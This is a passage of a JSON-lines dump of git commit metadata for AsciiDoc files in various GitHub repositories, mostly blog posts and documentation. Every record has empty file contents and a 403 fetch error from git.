1\/2020\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2020-03-31-debezium-newsletter-01-2020.adoc","new_file":"blog\/2020-03-31-debezium-newsletter-01-2020.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2ca7aab4cf6f64e88c692d9c4ecb81e85add92ba","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b92b05e3080f5d488ac074501fa40e8fd153863","subject":"Update 2018-2-2-Web-R-T-C.adoc","message":"Update 2018-2-2-Web-R-T-C.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-2-2-Web-R-T-C.adoc","new_file":"_posts\/2018-2-2-Web-R-T-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e11ff9b7475678ef1515c76862f6e272201016f","subject":"Update 2014-09-01-Recursive-lambdas-in-Java-8.adoc","message":"Update 2014-09-01-Recursive-lambdas-in-Java-8.adoc","repos":"pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io,pysaumont\/pysaumont.github.io","old_file":"_posts\/2014-09-01-Recursive-lambdas-in-Java-8.adoc","new_file":"_posts\/2014-09-01-Recursive-lambdas-in-Java-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysaumont\/pysaumont.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ccc8eab5115de48feee6e6198ea490b1a0286c3e","subject":"Description of public features.","message":"Description of public features.\n","repos":"CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords,CityOfNewYork\/NYCOpenRecords","old_file":"docs\/public-features.adoc","new_file":"docs\/public-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CityOfNewYork\/NYCOpenRecords.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4486d007ff1be2d472a6f7a6e6f4b2a519ba370f","subject":"Update 2017-07-11-the-students-outpost-about2.adoc","message":"Update 
2017-07-11-the-students-outpost-about2.adoc","repos":"TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io","old_file":"_posts\/2017-07-11-the-students-outpost-about2.adoc","new_file":"_posts\/2017-07-11-the-students-outpost-about2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheStudentsOutpost\/TheStudentsOutpost.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8f79105b93ec06c0ce6977ba59aed98dcba1911","subject":"profiling update","message":"profiling update\n","repos":"frans-fuerst\/thinks,frans-fuerst\/thinks,frans-fuerst\/thinks","old_file":"content\/available\/2015-04-15-19-profiling.asciidoc","new_file":"content\/available\/2015-04-15-19-profiling.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/frans-fuerst\/thinks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b83bf7f854904a3958e2d6cef727c2cafb0357a8","subject":"deprecate etc\/source.me","message":"deprecate etc\/source.me\n\nSigned-off-by: Gregg Reynolds <d0f77bc71a9867acdcb4f62f012b858edad79160@norc.org>\n","repos":"iotk\/iochibity-java,iotk\/iochibity-java,iotk\/iochibity-java,iotk\/iochibity-java,iotk\/iochibity-java,iotk\/iochibity-java,iotk\/iochibity-java","old_file":"etc\/source.me\/README.adoc","new_file":"etc\/source.me\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iotk\/iochibity-java.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"c72e592febc9b04d7de931dd78a5ea7eb0b1077f","subject":"Update 2016-02-06-Learning-resources-101.adoc","message":"Update 2016-02-06-Learning-resources-101.adoc","repos":"CBSti\/CBSti.github.io,CBSti\/CBSti.github.io,CBSti\/CBSti.github.io","old_file":"_posts\/2016-02-06-Learning-resources-101.adoc","new_file":"_posts\/2016-02-06-Learning-resources-101.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CBSti\/CBSti.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d22684d72ce622e18229a1b9c38c9dea4125825e","subject":"Update 2016-04-03-etat-limite-borderline.adoc","message":"Update 2016-04-03-etat-limite-borderline.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_file":"_posts\/2016-04-03-etat-limite-borderline.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07b72ad6924cfcd4cf83f151e8166cb327649584","subject":"Update 2016-11-05-About-The-Dullest-Saga.adoc","message":"Update 2016-11-05-About-The-Dullest-Saga.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-About-The-Dullest-Saga.adoc","new_file":"_posts\/2016-11-05-About-The-Dullest-Saga.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b0eaa4d0967c590578844808b169b15cb759bd2","subject":"Update 2017-05-01-Git-Flow-Groundhog-Day.adoc","message":"Update 2017-05-01-Git-Flow-Groundhog-Day.adoc","repos":"daemotron\/daemotron.github.io,daemotron\/daemotron.github.io,daemotron\/daemotron.github.io,daemotron\/daemotron.github.io","old_file":"_posts\/2017-05-01-Git-Flow-Groundhog-Day.adoc","new_file":"_posts\/2017-05-01-Git-Flow-Groundhog-Day.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/daemotron\/daemotron.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bce14f337666d5a75331474cab5165c0933ce38a","subject":"add GEP for records","message":"add GEP for records\n","repos":"keeganwitt\/groovy-website,keeganwitt\/groovy-website","old_file":"site\/src\/site\/wiki\/GEP-14.adoc","new_file":"site\/src\/site\/wiki\/GEP-14.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/keeganwitt\/groovy-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6013ab5ed6cfc10f353b623de521272787fd6a27","subject":"Sol link","message":"Sol link\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Class path\/Exercices.adoc","new_file":"Class path\/Exercices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ae207f589e02983f5d014b3bfb80dc59b8eafae","subject":"Update 2015-09-20-Flask-learning.adoc","message":"Update 2015-09-20-Flask-learning.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-20-Flask-learning.adoc","new_file":"_posts\/2015-09-20-Flask-learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14303d6025221ae4c10469da426a33d3031e0830","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","message":"Update 2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6ab6861ecd495fb2329663eee61f7dfd0423f2e","subject":"Update 2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","message":"Update 
2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_file":"_posts\/2015-06-18-Mein-freiwilliges-politisches-Jahr-Teil-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"429e1d66b750db888a31849331cd4882ca401d08","subject":"Update 2016-03-18-Introduction-au-fonctionnement-de-Bitcoin.adoc","message":"Update 2016-03-18-Introduction-au-fonctionnement-de-Bitcoin.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Introduction-au-fonctionnement-de-Bitcoin.adoc","new_file":"_posts\/2016-03-18-Introduction-au-fonctionnement-de-Bitcoin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8256eb46b8aa74c834a624781d43fa0f66dacb05","subject":"Update 2018-07-02-An-ode-to-the-Art-of-software-engineering.adoc","message":"Update 2018-07-02-An-ode-to-the-Art-of-software-engineering.adoc","repos":"anshu92\/blog,anshu92\/blog,anshu92\/blog,anshu92\/blog","old_file":"_posts\/2018-07-02-An-ode-to-the-Art-of-software-engineering.adoc","new_file":"_posts\/2018-07-02-An-ode-to-the-Art-of-software-engineering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anshu92\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ef5effe57a49c46143949980d635e685897989d","subject":"Fix a sentence in `core-testing-guide.adoc`","message":"Fix a sentence in `core-testing-guide.adoc`\n","repos":"EPadronU\/incubator-groovy,EPadronU\/incubator-groovy,EPadronU\/incubator-groovy,EPadronU\/incubator-groovy","old_file":"src\/spec\/doc\/core-testing-guide.adoc","new_file":"src\/spec\/doc\/core-testing-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EPadronU\/incubator-groovy.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1e4a4bd6c5b19455ce97366955ac084e92e0de34","subject":"Create Endpoint-dsl.adoc (#3642)","message":"Create Endpoint-dsl.adoc 
(#3642)\n\n","repos":"pmoerenhout\/camel,ullgren\/camel,gnodet\/camel,pmoerenhout\/camel,christophd\/camel,pax95\/camel,pmoerenhout\/camel,pax95\/camel,mcollovati\/camel,pax95\/camel,adessaigne\/camel,christophd\/camel,apache\/camel,alvinkwekel\/camel,mcollovati\/camel,DariusX\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,tadayosi\/camel,pax95\/camel,adessaigne\/camel,pax95\/camel,tdiesler\/camel,zregvart\/camel,apache\/camel,gnodet\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,christophd\/camel,apache\/camel,nicolaferraro\/camel,pmoerenhout\/camel,cunningt\/camel,cunningt\/camel,pmoerenhout\/camel,ullgren\/camel,tdiesler\/camel,nikhilvibhav\/camel,adessaigne\/camel,DariusX\/camel,nicolaferraro\/camel,mcollovati\/camel,adessaigne\/camel,cunningt\/camel,ullgren\/camel,ullgren\/camel,gnodet\/camel,nikhilvibhav\/camel,tadayosi\/camel,adessaigne\/camel,cunningt\/camel,cunningt\/camel,tadayosi\/camel,pmoerenhout\/camel,christophd\/camel,apache\/camel,gnodet\/camel,DariusX\/camel,zregvart\/camel,tdiesler\/camel,zregvart\/camel,alvinkwekel\/camel,tadayosi\/camel,tadayosi\/camel,cunningt\/camel,zregvart\/camel,tdiesler\/camel,christophd\/camel,apache\/camel,adessaigne\/camel,pax95\/camel,gnodet\/camel,christophd\/camel,tdiesler\/camel,tadayosi\/camel,nicolaferraro\/camel,tdiesler\/camel,apache\/camel,nicolaferraro\/camel,DariusX\/camel,mcollovati\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/Endpoint-dsl.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/Endpoint-dsl.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4addd9c0ad4e167e3cd5f920049cc8b63e251adb","subject":"Update 2016-12-05-Tytul.adoc","message":"Update 2016-12-05-Tytul.adoc","repos":"tr00per\/tr00per.github.io,tr00per\/tr00per.github.io,tr00per\/tr00per.github.io,tr00per\/tr00per.github.io","old_file":"_posts\/2016-12-05-Tytul.adoc","new_file":"_posts\/2016-12-05-Tytul.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tr00per\/tr00per.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"447c32b458658d88da9593f9ddc97c7e7db4f917","subject":"y2b create post My Ultimate Setup - Episode 3","message":"y2b create post My Ultimate Setup - Episode 3","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-12-21-My-Ultimate-Setup--Episode-3.adoc","new_file":"_posts\/2015-12-21-My-Ultimate-Setup--Episode-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"634723c8aeb1afc245667a52a04e17981174e70e","subject":"y2b create post FINALLY THE ULTIMATE BATTERY","message":"y2b create post FINALLY THE ULTIMATE BATTERY","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-17-FINALLY-THE-ULTIMATE-BATTERY.adoc","new_file":"_posts\/2016-06-17-FINALLY-THE-ULTIMATE-BATTERY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': 
The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef4c980f066887018e11dc6d7dfbad86c5e2f1db","subject":"get the Manpage build status icon right","message":"get the Manpage build status icon right","repos":"ArcEye\/MK-Qt5,araisrobo\/machinekit,mhaberler\/machinekit,ArcEye\/MK-Qt5,araisrobo\/machinekit,ArcEye\/MK-Qt5,ArcEye\/MK-Qt5,mhaberler\/machinekit,araisrobo\/machinekit,mhaberler\/machinekit,strahlex\/machinekit,mhaberler\/machinekit,strahlex\/machinekit,araisrobo\/machinekit,araisrobo\/machinekit,araisrobo\/machinekit,strahlex\/machinekit,mhaberler\/machinekit,ArcEye\/MK-Qt5,mhaberler\/machinekit,mhaberler\/machinekit,araisrobo\/machinekit,araisrobo\/machinekit,ArcEye\/MK-Qt5,strahlex\/machinekit,araisrobo\/machinekit,strahlex\/machinekit,ArcEye\/MK-Qt5,strahlex\/machinekit,strahlex\/machinekit,ArcEye\/MK-Qt5,mhaberler\/machinekit","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/araisrobo\/machinekit.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"b9359a6b1a52133fc43dc38cde28e091948346b6","subject":"Add RCA document template (#37)","message":"Add RCA document template (#37)\n\n* Add RCA document template\r\n\r\n* Add pointers in the RCA template based on comments from @polynomial\r\n","repos":"mbbx6spp\/styleguides","old_file":"docs\/RCA.adoc","new_file":"docs\/RCA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbbx6spp\/styleguides.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a072b5e4a20b3f893f895d93ef1c65a91d1bd621","subject":"#169: added README for search","message":"#169: added README for search\n","repos":"m-m-m\/util,m-m-m\/util","old_file":"search\/README.adoc","new_file":"search\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/m-m-m\/util.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"db29c7d9a9b201228e4735e78b71a4f5371bfae2","subject":"Documentation: remove dead link to groovy-contributions","message":"Documentation: remove dead link to 
groovy-contributions\n","repos":"apache\/groovy,jwagenleitner\/incubator-groovy,pledbrook\/incubator-groovy,armsargis\/groovy,upadhyayap\/incubator-groovy,paulk-asert\/groovy,russel\/groovy,apache\/groovy,russel\/groovy,armsargis\/groovy,alien11689\/incubator-groovy,shils\/incubator-groovy,jwagenleitner\/groovy,jwagenleitner\/incubator-groovy,traneHead\/groovy-core,armsargis\/groovy,bsideup\/incubator-groovy,jwagenleitner\/incubator-groovy,shils\/groovy,paulk-asert\/incubator-groovy,alien11689\/incubator-groovy,graemerocher\/incubator-groovy,russel\/incubator-groovy,alien11689\/incubator-groovy,shils\/groovy,russel\/incubator-groovy,bsideup\/incubator-groovy,avafanasiev\/groovy,paulk-asert\/incubator-groovy,dpolivaev\/groovy,avafanasiev\/groovy,russel\/incubator-groovy,shils\/groovy,upadhyayap\/incubator-groovy,pledbrook\/incubator-groovy,shils\/incubator-groovy,apache\/groovy,tkruse\/incubator-groovy,fpavageau\/groovy,jwagenleitner\/groovy,graemerocher\/incubator-groovy,paulk-asert\/incubator-groovy,pledbrook\/incubator-groovy,apache\/groovy,shils\/incubator-groovy,paplorinc\/incubator-groovy,tkruse\/incubator-groovy,shils\/groovy,paulk-asert\/incubator-groovy,paulk-asert\/groovy,traneHead\/groovy-core,shils\/incubator-groovy,russel\/groovy,jwagenleitner\/incubator-groovy,apache\/incubator-groovy,fpavageau\/groovy,paplorinc\/incubator-groovy,fpavageau\/groovy,dpolivaev\/groovy,upadhyayap\/incubator-groovy,paulk-asert\/groovy,apache\/incubator-groovy,apache\/incubator-groovy,paulk-asert\/groovy,apache\/incubator-groovy,fpavageau\/groovy,bsideup\/incubator-groovy,armsargis\/groovy,graemerocher\/incubator-groovy,dpolivaev\/groovy,russel\/incubator-groovy,alien11689\/incubator-groovy,traneHead\/groovy-core,dpolivaev\/groovy,tkruse\/incubator-groovy,paulk-asert\/incubator-groovy,jwagenleitner\/groovy,avafanasiev\/groovy,bsideup\/incubator-groovy,paplorinc\/incubator-groovy,graemerocher\/incubator-groovy,traneHead\/groovy-core,jwagenleitner\/groovy,paplorinc\/incubator-groovy,upadhyayap\/incubator-groovy,russel\/groovy,avafanasiev\/groovy,tkruse\/incubator-groovy,pledbrook\/incubator-groovy","old_file":"src\/spec\/doc\/contributors.adoc","new_file":"src\/spec\/doc\/contributors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/armsargis\/groovy.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6a43f3cf449407eedb1de93309202efcab3cea0c","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba696a95c4f04ecf786414235ebdec8f221c4622","subject":"Update 2016-07-15-Aprendizaje-basado-en-proyectos.adoc","message":"Update 
2016-07-15-Aprendizaje-basado-en-proyectos.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"_posts\/2016-07-15-Aprendizaje-basado-en-proyectos.adoc","new_file":"_posts\/2016-07-15-Aprendizaje-basado-en-proyectos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marchelo2212\/marchelo2212.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c66bd036cdd8a6b43153b8e55a15c5e407aa9400","subject":"Update 2017-04-26-Drift-Focus.adoc","message":"Update 2017-04-26-Drift-Focus.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-04-26-Drift-Focus.adoc","new_file":"_posts\/2017-04-26-Drift-Focus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9e397b3218a9a90fe1740496e2e2c78bd7fd02c","subject":"Update 2015-02-15-Indexing-large-collection-of-medical-files.adoc","message":"Update 2015-02-15-Indexing-large-collection-of-medical-files.adoc","repos":"theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io,theofilis\/theofilis.github.io","old_file":"_posts\/2015-02-15-Indexing-large-collection-of-medical-files.adoc","new_file":"_posts\/2015-02-15-Indexing-large-collection-of-medical-files.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theofilis\/theofilis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"861557a256216dc39a89d313e2ec743684f8bea9","subject":"Update 2015-04-20-Opensource-identity-and-abandonment-issues.adoc","message":"Update 2015-04-20-Opensource-identity-and-abandonment-issues.adoc","repos":"thiderman\/daenney.github.io,thiderman\/daenney.github.io,thiderman\/daenney.github.io","old_file":"_posts\/2015-04-20-Opensource-identity-and-abandonment-issues.adoc","new_file":"_posts\/2015-04-20-Opensource-identity-and-abandonment-issues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thiderman\/daenney.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37358027bef9a675046869049ae36be38097d598","subject":"Update 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","message":"Update 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_file":"_posts\/2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29b96bd196f43e05e1dec44e76e17434a925cf25","subject":"Fixed unspecified allegory","message":"Fixed unspecified 
allegory\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"23276d40b3d9542748afe27df9a9fcca6200f146","subject":"Create the reserved keywords CIP","message":"Create the reserved keywords CIP\n\n- Motivation\n- Description\n- Specification\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/1.accepted\/CIP2016-12-19-Reserved-keywords.adoc","new_file":"cip\/1.accepted\/CIP2016-12-19-Reserved-keywords.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e906261b08d764dc3ee3ab095df494d9224797f8","subject":"Update 2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","message":"Update 2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","new_file":"_posts\/2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36c93bccfab356df9b468c82ab8885ae2e0ec303","subject":"Update 2016-07-20-References-and-Values-and-Bears-Oh-My.adoc","message":"Update 2016-07-20-References-and-Values-and-Bears-Oh-My.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-07-20-References-and-Values-and-Bears-Oh-My.adoc","new_file":"_posts\/2016-07-20-References-and-Values-and-Bears-Oh-My.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c44d74eae3e457ed69f3d8b9f389a6620399a32","subject":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","message":"Update 2016-03-19-Bitcoin-comment-ca-marche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_file":"_posts\/2016-03-19-Bitcoin-comment-ca-marche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0bc9fec1f1fe6044428b306323bb6c7f37a8e71a","subject":"Publish 2016-6-26-PHRER.adoc","message":"Publish 2016-6-26-PHRER.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-PHRER.adoc","new_file":"2016-6-26-PHRER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
